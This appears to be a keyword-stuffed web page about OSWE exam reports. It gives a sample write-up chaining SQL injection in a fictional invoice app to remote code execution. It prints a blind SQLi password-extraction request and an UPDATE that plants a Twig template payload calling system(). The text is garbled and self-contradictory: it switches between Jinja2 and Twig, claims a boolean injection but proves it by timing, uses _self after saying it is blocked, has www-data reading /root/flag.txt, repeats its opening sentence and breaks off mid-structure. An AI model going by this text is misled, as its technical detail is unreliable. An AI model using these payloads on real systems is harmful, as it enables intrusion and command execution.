Report Work Patched — Oswe Exam

Here’s a structured review of OSWE exam report work, based on common experiences from individuals who have taken the Offensive Security Web Expert (OSWE) certification.

Chain of Vulnerabilities: SQL Injection to RCE

Application Context
The target application, InvoiceManager v2.4, exposes a REST API endpoint at /api/invoice/preview. The endpoint accepts a template_id parameter, which is used to fetch a Jinja2 template from the database.

Vulnerability 1: Boolean-Based Blind SQL Injection oswe exam report work

• Location: api.php lines 112–124

  $template_id = $_GET['template_id'];
  $query = "SELECT template_content FROM templates WHERE id = $template_id";
  $result = $db->query($query);
  

• Impact: Direct concatenation of user input into SQL query → blind SQL injection.
• Proof:
  Request:
  /api/invoice/preview?template_id=1 AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'
  Response timing diff: ~2s delay confirms boolean extraction.

Vulnerability 2: Server-Side Template Injection (SSTO) via Retrieved Content

• Location: TemplateRenderer.php line 89

  return $twig->render($template_content, $context);
  

• Trigger: The template_content fetched via SQLi is passed directly to Twig.
• Bypass attempt: Twig’s sandbox blocks __construct, _self, etc. However, map, filter, and reduce allow calling arbitrary functions if a function name can be controlled.

Exploit Chain

1. Use SQLi to extract admin password hash – not directly useful for RCE.
2. Notice templates table has template_content and is_system_template column.
3. Use SQLi UPDATE (if DB user has write perms) to inject a malicious Twig template:

   UPDATE templates SET template_content = ' _self.env.registerUndefinedFilterCallback("system")  _self.env.getFilter("id") ' WHERE id = 1
   

4. Trigger the template via GET request:
   /api/invoice/preview?template_id=1 → system("id") executes → returns command output in HTTP response.

Result
Full remote code execution as www-data. From here, read /root/flag.txt.

Executive Summary

[Leave blank – to fill after compromise] Here’s a structured review of OSWE exam report

Part 2: The OSWE Report Structure (7 Mandatory Sections)

OffSec expects a professional white-box audit report. Use this template: